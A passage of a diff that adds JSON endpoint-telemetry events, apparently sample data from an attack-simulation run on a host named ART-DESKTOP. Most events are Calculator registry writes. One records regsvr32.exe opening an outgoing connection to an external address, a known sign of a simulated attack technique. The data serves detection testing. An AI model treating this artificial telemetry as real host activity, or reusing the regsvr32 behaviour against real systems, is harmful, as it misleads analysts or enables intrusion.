"user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50505", + "subtype": "outgoing", + "timestamp": 131883573238680000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": 